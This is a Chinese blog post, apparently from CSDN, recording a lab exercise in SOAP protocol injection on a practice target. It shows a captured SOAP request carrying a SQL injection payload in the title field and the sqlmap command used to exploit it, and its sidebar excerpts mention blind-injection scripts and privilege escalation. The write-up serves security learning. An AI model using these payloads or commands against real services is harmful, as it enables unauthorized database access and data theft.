SOAP注入学习——安鸾靶场---SOAP协议注入 练习记录

最新推荐文章于 2023-10-26 15:35:50 发布
最新推荐文章于 2023-10-26 15:35:50 发布
阅读量2.6k 收藏 1
点赞数 1
分类专栏: CTF -WEB 学习 文章标签: 安全 spring java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122770895
版权

新年好啊!

今天初二,给大家拜个年了,也祝师傅们新的一年取得更大的进步。

目录

SOAP注入知识点

过程

 

SOAP注入知识点

SOAP注入 - 知乎

👆👆👆👆👆👆👆👆👆👆👆👆详细的大家可以看上面掌控者学院的解释(不是广告)。

当然,如果想仔细理解的话,看上面的解释已经是足够了,不过,我觉得大家还是喜欢听人话。。。。。。。。。。。。。。

大家如果熟悉sql注入的话,肯定是知道我们输入的数据会放在数据库进行比较的,一般我们通过拼接语句,进而爆出数据库的东西。

凡是我们输入的数据会拼接到数据库中查询的,都有可能存在sql注入

为什么要先讲这个呢???

这个和SOAP协议注入有什么关联么???

而SOAP又是什么呢???

  1. 首先可以理解为SOAP是一种xml格式的数据。
  2. SOAP协议最终的产物是一个xml格式数据。
  3. 而且数据库会存储这种XML格式的数据。
  4. 这样就满足了sql注入的存在可能 。

例子 建议先看看教程

 SOAP注入 - 知乎

这是soap协议的XML文件

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetServiceCustomer xmlns="http://tempuri.org/">
      <UserID>string</UserID>
      <ServiceType>string</ServiceType>
      <CO_CODE>string</CO_CODE>
    </GetServiceCustomer>
  </soap:Body>
</soap:Envelope>

其中UserID 这个数据可能存在注入,

所以我们需要找到上传UserID 的功能点,最后修改发送的包含XML数据的数据包。

过程

先查找下目录

然后并没有发现啥数据 只有个 /soap

 存在wsdl文件,但怎么找到发送数据包得地方呢?

按照大佬的write up 走,AWVS扫描一下。

没扫出SOAP注入漏洞 。但有地址了

选择 AWVS 的 web service scanner 模块 扫描漏洞地址

出现漏洞报告(注意点击  View HTTP headers)

 其实这里用bp抓包也能实现。

复制 发送的数据包

POST /ws_soap.php HTTP/1.1
Content-Type: text/xml
SOAPAction: "urn:tickets_stock#get_tickets_stock"
Content-Length: 572
X-Requested-With: XMLHttpRequest
Referer: http://47.103.94.191:8018/ws_soap.php?wsdl
Host: 47.103.94.191:8018
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="urn:movie_service">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <get_tickets_stock>
         <title>-1&apos; OR 3*2*1=6 AND 000666=000666 -- </title>
        </get_tickets_stock>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

新建一个名为2.txt的文件,把上面的数据复制。

sqlmap 跑 比较慢 需要 10分钟左右

sqlmap -r 2.txt -batch

只存了一张图了 。。。

参考链接

SOAP注入 - 知乎

SOAP注入攻击详解(转)_weixin_30849403的博客-CSDN博客

 SQL注入:SOAP协议注入_zh的博客-CSDN博客

本文目的是为了传播网络安全知识,一切的操作都是在靶场进行,禁止利用本文提到的任何技术与工具进行违法操作!后果自负!

日站不规范,亲人两行泪!

AAAAAAAAAAAA66
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
测试SOAP注入.docx
09-06
测试SOAP注入
安鸾SOAP协议注入
weixin_51861515的博客
02-25 435
抓包结合数据构造xml 进行测试只有or可以用 可以进行布尔盲注 写脚本时要注意缩进 #coding:utf-8import requestsheaders={'Content-Type':'text/xml', 'SOAPAction':'urn:get_tickets_stock'} url="http://47.103.94.191:8018/ws_soap.php"result=""for x in range(1,100): hig...
SOAP注入
weixin_50464560的博客
09-07 2032
一、soap 注入简介 因为soap注入就是在webservice 的soap协议,连接web服务和客户端的接口处的注入,通过在发送的soap消息参数内添加注入语句来达到注入效果,常见的有sql注入,也有xml注入,代码注入 二、什么是soap 首先介绍webservice,webservice是一种跨平台,跨语言的规范,用于不同平台,不同语言间的交互 webservice有三要素,分别为soap,wsdl和uddl uddl用于提供发布和查询webservice方法 wsdl是webservice服务描述
Soap 协议 详解
emowuyi
08-19 463
SOAP简介SOAP(SimpleObjectaccessPRotocal,简单对象访问协议)技术有助于实现大量异构程序和平台之间的互操作性,从而使存在的应用能够被广泛的用户所访问。SOAP是把成熟的基于HTTP的WEB技术与xml的灵活性和可扩展性组合在了一起。SOAP 的一个主要目标是使存在的应用能被更广泛的用户所使用。为了实现这个目的,没有任何SOAPAPI或SOAP对象请求代理(SOAPO...
easy-soap-request:小型Node.js库可简化SOAP请求
05-04
npm install easy-soap-request 要求 Node.js> = 7.6.0(异步/等待支持) 用法 Node.js const soapRequest = require ( 'easy-soap-request' ) ; const fs = require ( 'fs' ) ; // example data const url = '...
SOAP病史1-高血压.docx
05-26
SOAP病史1-高血压
soap-client:PHP的通用SOAP客户端
04-28
让我们检查一下此程序包可以解决的一些难题:演示版安装$ composer require phpro/soap-client脚手架向导由于寿命太短,无法阅读文档,因此我们添加了一个脚手架向导,可让您立即与SOAP服务器通信! 您需要做的只是...
laravel-soap:Laravel Soap Client
03-27
Laravel SOAP客户端版本号Laravel SOAP版本Laravel支持1.x 5.6、6.x,7x 2.x 8.x安装执行以下命令以获取软件包的最新版本: composer require codedredd/laravel-soap文献资料您可以在这里找到详细的贡献请发布问题...
zimbra-api:围绕Zimbra Soap APIPHP包装器库
05-25
Zimbra API 该API是zimbra soap api(Web服务)的简单的面向对象包装。 它是用PHP 5.x编写的。 它使您可以轻松管理zimbra帐户,zimbra域和zimbra服务器。... { " require " : { " zimbra-api/soap-api " : "
soap 注入
最新发布
黑战士的博客
10-26 383
soap是简单对象访问协议,用于分布式环境的基于信息交换的同行协议,描述传递信息的格式和规范,它可以用于连接web服务和客户端之间的接口,是一个可以在不同操作系统上运行的不同语言编写的程序之间的传输通信协议,格式为xml,soap消息。soap注入在webservice的soap协议,连接web服务和客户端的接口处的注入,通过在发送的soap消息参数内添加注入语句来达到注入效果。wsdl是webservice服务描述语言,用于web服务说明,它是一个xml文档,用于说明一组soap消息如何访问接口。
SQL注入SOAP协议注入
zh的博客
10-12 665
靶场地址:http://www.whalwl.host:8018/ 解题准备:AWVS扫描,以及sqlmap 解题思路: 1、首先用AWVS扫描站点,发现存在soap注入的页面地址 2、复制请求数据包,在kali中保存为soap.txt,使用sqlmap进行爆破 sqlmap -r soap.txt 3、确认数据为mysql,爆破库名 sqlmap -r soap.txt --dbms mysql --dbs whalwl应该就是靶场数据库,继续爆tables sqlm...
soap注入某sql2008服务器结合msf进行提权
weixin_34228662的博客
06-05 377
soap注入某sql2008服务器结合msf进行提权simeon    在实际成功×××过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次×××利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的...
ESB、SOAP和WSDL java注入
u014552589的专栏
04-05 1720
ESB、SOAP和WSDL java注入   我的方法很简单,就是:看书、思考、写笔记、做实验、再思考、再写笔记,看it认证题库网的题库 .看完理论的东西,自己静下心来想想,多问自己几个为什么,然后把所学和所想的知识点做个笔记;在想不通或有疑问的时候,就做做实验,想想怎么会这样,同样的,把实验的结果记下来。思考和做实验是为了深入的了解这个知识点。而做笔记的过程,也是理清自己思路的过程。
[BUUCTF]从WEB题学习SOAP+CLRF注入攻击
Y4tacker的博客
10-21 2861
文章目录考点前言WP参考链接 考点 SOAP+CLRF+PHAR+反弹shell 前言 做自己喜欢的事情,别计较得失 这些题也太喜欢phar与反弹shell了啊这 Add:一些文章中所提到的学习链接放到了参考链接处 WP 首先是文件上传的部分,输入参数开头过滤了一堆协议吧,上次极客大挑战就是用compress.bzip加上phar绕过了,这次通过网上wp发现还可以配合php://filter/resource绕过前缀限制,从而触发phar反序列化 include 'class.php'; if (isse
SOAP注入攻击详解(转)
weixin_30849403的博客
12-14 1195
在本文中,我们将要对SOAP服务中的一系列安全漏洞进行测试及利用。并不是所有的攻击行为都针对SOAP,我们必须对这一情况具备清醒的认识。 这一行的新手往往有种先入为主的观念,认为威胁网页服务安全的各类攻击总带有一些神秘色彩并且超难阻止。但实际情况是,网页服务遭受的许多侵袭都源自与浏览器应用程序安全缺陷相类似的同一种漏洞。 我们在本文中打算讲解并利用的漏洞类型分别为: 1. SOAP 注入 ...
(39.3)【XML漏洞专题】XML注入——查找、注入、防止SOAP
08-20 1924
【XML漏洞专题】XML注入——查找、注入、防止SOAP
soap用post传递xml及xml问题
点点滴滴
04-02 1163
首先别人 已经做了一个库 http://sourceforge.net/projects/ksoap2/ http://code.google.com/p/ksoap2-android/wiki/SourceCodeHosting?tm=4   如果想自己写一个 1.传递简单html 以及数据问题 HttpClient httpclient = new DefaultHttpClien...
CXF SOAP:Header转换成SOAP-ENV:Header
06-02
要将CXF SOAP消息中的`<SOAP-ENV:Header>`转换成`<SOAP-ENV:Header>`,可以使用CXF提供的拦截器来实现。 首先,创建一个拦截器类,继承自AbstractSoapInterceptor类,并实现handleRequest和handleResponse方法。在handleRequest方法中,将CXF SOAP消息中的`<SOAP-ENV:Header>`节点替换为`<SOAP-ENV:Header>`节点;在handleResponse方法中,将`<SOAP-ENV:Header>`节点替换为`<SOAP-ENV:Header>`节点。 ```java public class SoapHeaderInterceptor extends AbstractSoapInterceptor { public SoapHeaderInterceptor() { super(Phase.PRE_PROTOCOL); } @Override public void handleMessage(SoapMessage message) throws Fault { // 获取SOAP消息的头部 Header header = message.getHeaders().get(0); // 获取SOAP消息的DOM节点 Element headerElement = (Element) header.getObject(); // 创建新的SOAP消息头节点 Element newHeaderElement = headerElement.getOwnerDocument().createElementNS("http://schemas.xmlsoap.org/soap/envelope/", "SOAP-ENV:Header"); // 复制原来的SOAP消息头节点的所有子节点到新的SOAP消息头节点中 NodeList childNodes = headerElement.getChildNodes(); for (int i = 0; i < childNodes.getLength(); i++) { newHeaderElement.appendChild(headerElement.getOwnerDocument().importNode(childNodes.item(i), true)); } // 将新的SOAP消息头节点替换原来的SOAP消息头节点 header.setObject(newHeaderElement); } @Override public void handleFault(SoapMessage message) { // do nothing } } ``` 然后,在CXF服务端和客户端的配置文件中,添加该拦截器: ```xml <jaxws:endpoint id="exampleService" implementor="com.example.ExampleServiceImpl" address="/exampleService"> <jaxws:inInterceptors> <bean class="com.example.SoapHeaderInterceptor" /> </jaxws:inInterceptors> </jaxws:endpoint> <jaxws:client id="exampleClient" serviceClass="com.example.ExampleService" address="http://localhost:8080/exampleService"> <jaxws:outInterceptors> <bean class="com.example.SoapHeaderInterceptor" /> </jaxws:outInterceptors> </jaxws:client> ``` 这样,在CXF SOAP消息发送和接收时,就可以将`<SOAP-ENV:Header>`转换成`<SOAP-ENV:Header>`了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值